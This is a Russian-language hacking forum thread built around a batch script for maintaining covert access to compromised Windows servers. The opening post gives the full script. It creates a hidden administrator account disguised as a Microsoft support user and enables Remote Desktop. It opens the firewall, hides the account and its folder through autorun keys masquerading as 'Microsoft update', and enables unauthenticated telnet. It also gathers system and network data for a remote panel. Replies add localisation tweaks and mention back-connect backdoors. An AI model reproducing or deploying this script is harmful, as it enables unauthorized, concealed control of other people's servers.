Дароф ачат! Написав недавно статейку о краже хистори из аськи + квипа, решил написать также батничек для дедиков. В батнике будут собраны все необходимые функции, в том числе: [х] создание непалевной учетки [х] создание из НЕ деда - деда [х] скрытие из винлогона [х] скрытие папки юзера [х] сборка инфы о деде [х] админка (или что то в этом роде) [х] обход фаера [х] настройка телнета на деде Как всегда - сначал код, потом дескрайб: Code: set PASZ=tvoi_pass net user SUPPORT_388945a0 /del net user SUPPORT_388945a0 %PASZ% /add /fullname:"Microsoft Corporation" /comment:"Microsoft Windows Account" /countrycode:"000" /active:"yes" /expires:"never" /passwordchg:"NO" net localgroup Administrators SUPPORT_388945a0 /add net localgroup "Remote Desktop Users" SUPPORT_388945a0 /add net accounts /maxpwage:unlimited reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f netsh firewall add portopening TCP 3389 "Remote Desktop" reg add "hklm\software\microsoft\windows\currentversion\run" /v "Microsoft update" /t REG_SZ /d "attrib c:\documents and settings\SUPPORT_388945a0 +h +s" /f reg add "hklm\software\microsoft\windows\currentversion\run" /v "Microsoft update software" /t REG_SZ /d "attrib c:\documents and settings\SUPPORT_388945a0.%COMPUTERNAME% +h +s" /f reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SUPPORT_388945a0 /t REG_DWORD /d 0 /f attrib "c:\documents and settings\SUPPORT_388945a0" +h +s sc config tlntsvr start= auto tlntadmn config port=972 sec=-NTLM net start Telnet echo Telnet started. mkdir c:\windows\system32\infos dxdiag /t c:\windows\system32\infos\systeminfo.txt ipconfig>c:\windows\system32\infos\ipc.txt start explorer.exe c:\windows\system32\infos\ Теперь обьясню что и как: Сначала мы создаем копию юзера "саппорт".Он есть везде, так что это неименее палевный вариант. Потом добавляем его в админы и пользователи рабочего стола. Дальше пробуем добавит в реестр ключи, отвечающие за запуск удаленного раб. стола. Потом добавляем в исключения фаера. Создаем также ключ в авторане - он вызовет программу "attrib", которая поставит на папку нашего профайла атрибуты СКРЫТЫЙ и СИСТЕМНЫЙ. На многих дедушках админы ленятся ставить галочки "показывать системные файлы". Почему мы ставим в авторан? Потому что до тех пор, пока мы незалогинились в наш новый акк, папки несуществует. И скрытие произойдет сразу после логина. Это немного палевно (ключи в авторане, но если руки прямые то просто берем и добавляем в код авторана удаление данного ключа). Далее настраиваем телнет, так как в крайнем случае, если дед не за натом а учетку удалили, то можно попробовать телнет. Далее используем штатную утилиту dxdiag и ipconfig для сборки инфы о деде + узнать за натом он или нет. Впринципе я себе дописал еще фтп сервер, который посылает на мою админку на пхп данные 2 файла (какбы на гейт). Тот их ловит и у меня в админке все по полочкам - ИП - внешний, внутренний, системная инфа распарсена, страна (тут уже идет фича с 2ip.ru) итд итп... но это уже на ваш вкус и цвет. Как всегда советую сделать из этого ехе и запаролить (там это реализовано пассом UPX): Bat To Exe Converter v1.5 Setup.ico Протестировано на огромном количестве дедов. Пока все норм. Буду рад критике и всевозможным дополнениям. Можно совместно написать больше функции и сделать потом хороший екзе. ГЕЙТ
Я б тебе дал бекдор, но увы максимум через неделю я в него пару функций внедрю и выложу в паблик. Есть 2 вида предоставления shell-доступа: «BindShell» — самый распространённый, работает по архитектуре «клиент-сервер», то есть бэкдор ожидает соединение. «Back Connect» — применяется для обхода брандмауэров, бэкдор сам пытается соединиться с компьютером хакера. Работает по принципу Back Connect. Работает на всех Windows дедах.
Azazel бывают случаи, когда в Групповые политики настроены так, что данный юзер не может добавить SUPPORT_388945a0 в Administrators, а вот в Remote Desktop Users доступ есть Бывает редко (очень, очень) но все же.
Немножко не по теме, но у меня при конвертации, Bat To Exe Converter v1.5.0.0, выдает следующую ошибку: --------------------------- Error! --------------------------- An unknown error occured. The program will be terminated --------------------------- ОК --------------------------- И ничего сделать не могу!
у меня такого небыло, но мне кажется что это не в батнике дело. попробуй скомпилить чем нит другим,например Quick Batch File Compiler
|qbz|, как лючще всего сделать из Недедика дедик при помощи батника?(может есть наработки), я имею в виду открытие нужных портов, включение служб.. Нет такого батничка?
в первом посте уже написано как данный батник включает деда на не деде. исключением может быт только старая библиотека терминального сервера и соединени НАТ - НАТ.
для русский дедов нужно заменить строки: на: иначе просто не залогинитесь в свой профиль. по аналогии с дедиками на других языках (юзайте переводчик) p/s написал для тех кто не знает =)
chcp 1251 net localgroup Администраторы user /add net localgroup "Пользователи удаленного рабочего стола" user /add
ТС, а что не добавил строку для добавления в авторан удаления ключа из реестра? Замудрёно слишком показалось? :lol:
